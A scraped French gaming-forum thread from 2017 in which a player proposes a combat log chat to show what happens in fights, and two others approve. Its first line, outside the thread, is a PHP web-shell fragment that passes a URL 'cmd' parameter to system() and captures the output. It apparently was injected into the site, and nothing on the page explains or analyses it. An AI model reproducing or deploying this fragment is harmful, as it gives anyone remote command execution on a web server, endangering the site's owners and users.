ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
!show!: 629|Reponse: 2

Chat combat [Copier l'URL]

Rank: 4

Heure de publication 2017-4-9 17:25:24 |Afficher toutes les publications
Edite par raknard a 2017-4-9 17:25

Bonsoir,

Je me permet de poster ce sujet, qui a surement déja été posté, en apportant une proposition avec images ! (ouaaah !)

Sur le jeu, il est difficile de voir réelement tout se qui ce passe dans un combat.

Voici donc ma proposition :

Creer pour les reportes et même directement en jeu un chat qui repertorie le déroulement du fight précédent  se qui est le cas dans pas mal de jeu petit exemple:

Merci.
Piece jointe: Vous devez Vous identifier pour telecharger ou visualiser les pieces jointes. Pas de compte ?

Utiliser la magie Signaler

Rank: 3Rank: 3

Heure de publication 2017-4-9 21:09:07 |Afficher toutes les publications
un affichage simplifié des dégats et heal effectué lors du combat. oui c'est vrai que ça pourrait être sympa, on pourrait au moins mieux comprendre le déroulement d'un combat, et même pouvoir faire nos calculs sans avoir à bien regarder l'instant "T" ou ya pas un bug d'affichage qui cache le "sprite" de dégat au dessus du personnage ^^

j'approuve !

Rank: 6Rank: 6

Heure de publication 2017-4-10 23:59:55 |Afficher toutes les publications
j'approuve fortement l'idée

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-1-18 02:01 , Processed in 0.022659 second(s), 11 queries , Xcache On.